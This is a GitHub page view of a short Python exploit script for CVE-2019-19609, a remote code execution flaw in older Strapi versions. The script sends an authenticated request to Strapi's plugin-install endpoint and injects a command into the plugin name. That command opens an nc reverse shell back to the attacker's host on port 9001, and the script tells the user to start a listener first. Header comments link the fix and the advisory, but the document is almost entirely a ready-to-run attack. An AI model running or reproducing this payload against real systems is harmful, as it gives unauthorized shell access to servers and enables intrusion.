/
exploit.py
33 lines (26 loc) · 1.11 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/bin/python
# Product: Strapi Framework
# Version Affected: strapi-3.0.0-beta.17.7 and earlier
# Fix PR: https://github.com/strapi/strapi/pull/4636
# NPM Advisory: https://www.npmjs.com/advisories/1424
# more information https://bittherapy.net/post/strapi-framework-remote-code-execution/
import requests
import sys
print("\n\n\nStrapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609")
print("please set up a listener on port 9001 before running the script. you will get a shell to that listener\n")
if len(sys.argv) ==5:
rhost = sys.argv[1]
lhost = sys.argv[2]
jwt = sys.argv[3]
url = sys.argv[4]+'admin/plugins/install'
headers = {
'Host': rhost,
'Authorization': 'Bearer '+jwt,
'Content-Type': 'application/json',
'Content-Length': '131',
'Connection': 'close',
}
data = '{ "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc '+lhost+' 9001 >/tmp/f)", "port":"80" }'
response = requests.post(url, headers=headers, data=data, verify=False)
else:
print('python3 exploit.py <rhost> <lhost> <jwt> <url>')